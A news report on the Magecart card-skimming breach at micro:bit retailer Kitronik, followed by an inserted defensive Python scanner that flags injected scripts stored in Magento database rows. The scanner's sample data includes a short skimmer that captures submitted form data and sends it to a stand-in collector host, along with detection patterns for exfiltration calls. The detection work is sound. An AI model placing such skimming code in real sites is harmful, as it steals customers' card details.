BBC micro:bit vendor Kitronik says customers' deets nicked, fingers Magecart malware

We're one of 7,000 victims here, firm insists

Educational electronics outlet Kitronik has suffered a data breach which its data controller suspects was caused by the same strain of malware that ransacked British Airways' website.

In an email seen by The Register, Kitronik's Geoff Hampson told customers that the Magecart spyware had been operating on the gadget shop's website over August and September.

"Anyone that has followed the news in recent months will be aware of the malicious software 'Magecart' that has been recording customers' key presses on such high profile websites as British Airways and Ticketmaster. The malicious software records key presses at the checkout stage, to capture sensitive details. From some point early in August until mid-September the same malicious software has been present on the Kitronik website," he wrote.

Kitronik's website runs the open-source Magento e-commerce platform, which has been periodically targeted by mischief-makers.

As reported previously on El Reg, Magecart works by planting JavaScript onto the payment pages of websites that use embedded third-party components. That JS then beams data entered by site users back to a server controlled by the criminals.

Details exposed in the infection on Kitronik's website included customers' names, email addresses, card numbers, expiry dates, CVV (verification) codes and cardholders' postal addresses – everything a fraudster would need to start making online purchases.

"We think that it is only details entered at the checkout stage that might have been taken and as a result, customers that had set up an account prior to August would not have had their address details stolen," continued Hampson's email. He also speculated that schools and businesses that had credit facilities were "not likely" to have been affected, adding:

Although we have a mechanism in place to alert us if the code on the website changes, this attack was very sophisticated and bypassed that code by making changes to the website database. The companies that take card payments on our behalf monitor trends and it was the payment gateway provider that notified us of a higher than normal amount of fraud, which triggered our investigation.
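Hampson's point is the one defenders should take away: a file-integrity monitor watches the code on disk, but Magento also renders HTML and script stored in its database (CMS blocks, CMS pages, the "head includes" design setting), so a skimmer injected there never trips a file checksum. The following is an added example, not Kitronik's or Magento's own code, of the complementary check: scanning HTML held in database rows for script tags that load from hosts outside an allowlist, or inline scripts that both hook form input and send data elsewhere. The table names mirror Magento's, but the rows, the hostnames and the allowlist are constructed placeholders, and the content heuristics are assumptions a real deployment would tune.

```python
import re
from urllib.parse import urlparse

# Hosts from which the shop's own pages are expected to load script.
# Constructed placeholders; a real deployment would list its own CDN and payment gateway.
ALLOWED_SCRIPT_HOSTS = {"shop.example", "static.shop.example"}

SCRIPT_TAG = re.compile(r"<script\b([^>]*)>(.*?)</script>", re.IGNORECASE | re.DOTALL)
SRC_ATTR = re.compile(r"""\bsrc\s*=\s*["']([^"']+)["']""", re.IGNORECASE)
# Event hooks an inline script would need to read what a customer types or submits.
CAPTURE_HINT = re.compile(r"\b(keydown|keypress|keyup|input|change|submit|click)\b", re.IGNORECASE)
# Ways for an inline script to move collected data to another host.
EXFIL_HINT = re.compile(r"(fetch\s*\(|XMLHttpRequest|sendBeacon|new\s+Image\s*\(|\.src\s*=)", re.IGNORECASE)

# Constructed rows in the shape of Magento tables that can hold HTML or JS.
# None of this is real Kitronik data.
SAMPLE_ROWS = [
    {"table": "cms_block", "id": 1,
     "content": '<p>Welcome to our shop.</p><script src="https://static.shop.example/js/app.js"></script>'},
    {"table": "core_config_data", "id": 2,  # design/head/includes, rendered on every page
     "content": '<script src="//cdn.stats-collector.example/s.js"></script>'},
    {"table": "cms_page", "id": 3,
     "content": '''<h1>Checkout</h1>
<script>
document.addEventListener("submit", function (e) {
  var f = new FormData(e.target);
  fetch("https://collector.example/c", {method: "POST", body: f});
});
</script>'''},
    {"table": "cms_block", "id": 4,
     "content": '<script>console.log("footer loaded");</script>'},
]


def extract_scripts(html):
    """Return a list of (src_or_None, inline_body) for every <script> tag in html."""
    scripts = []
    for attrs, body in SCRIPT_TAG.findall(html):
        src_match = SRC_ATTR.search(attrs)
        scripts.append((src_match.group(1) if src_match else None, body.strip()))
    return scripts


def classify_script(src, body, allowed_hosts):
    """Return a list of human-readable reasons this script looks injected (empty if clean)."""
    reasons = []
    if src:
        # urlparse handles protocol-relative "//host/path" as well as absolute URLs;
        # a relative path yields an empty netloc and is treated as first-party.
        host = urlparse(src).netloc.lower()
        if host and host not in allowed_hosts:
            reasons.append(f"external script host {host} not in allowlist")
    if body and CAPTURE_HINT.search(body) and EXFIL_HINT.search(body):
        reasons.append("inline script hooks form input and sends data to the network")
    return reasons


def scan_rows(rows, allowed_hosts=ALLOWED_SCRIPT_HOSTS):
    """Scan database rows holding HTML; return one finding per suspicious script tag."""
    findings = []
    for row in rows:
        for src, body in extract_scripts(row["content"]):
            reasons = classify_script(src, body, allowed_hosts)
            if reasons:
                findings.append({"table": row["table"], "id": row["id"],
                                 "src": src, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan_rows(SAMPLE_ROWS):
        print(f"{finding['table']}#{finding['id']}: {finding['src'] or '<inline>'}")
        for reason in finding["reasons"]:
            print(f"  - {reason}")
```

Run against a live store this would read the rows from the database rather than `SAMPLE_ROWS`, and the useful operational step is diffing its output against a baseline taken when the site was known clean, on the same schedule as the file-integrity check. The inline-script heuristic is deliberately coarse: it exists to surface candidates for a human to read, not to replace a content security policy or the gateway's own fraud monitoring that in this case raised the alarm.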

When contacted for comment by The Register, Hampson did not say how many customers had been affected, nor did he confirm whether the Information Commissioner's Office had been informed. Section 67 of the Data Protection Act 2018 (implementing Article 33 of the EU's GDPR) makes it a legal requirement that the watchdog be informed within 72 hours of an organisation becoming aware of a data breach "where feasible".

Among other things, Kitronik focuses on selling accessories for the BBC micro:bit proto-puter, designed as a teaching tool to get schoolkids interested in coding.

Infosec researcher Willem de Groot has a blog post with precise details of how the latest strain of Magecart exploits zero-days, while a closely related malware strain, Magentocore, infected 7,000 sites, according to him.

An ICO spokesperson said: "We are aware of an incident involving Kitronik and we will be making enquiries." ®
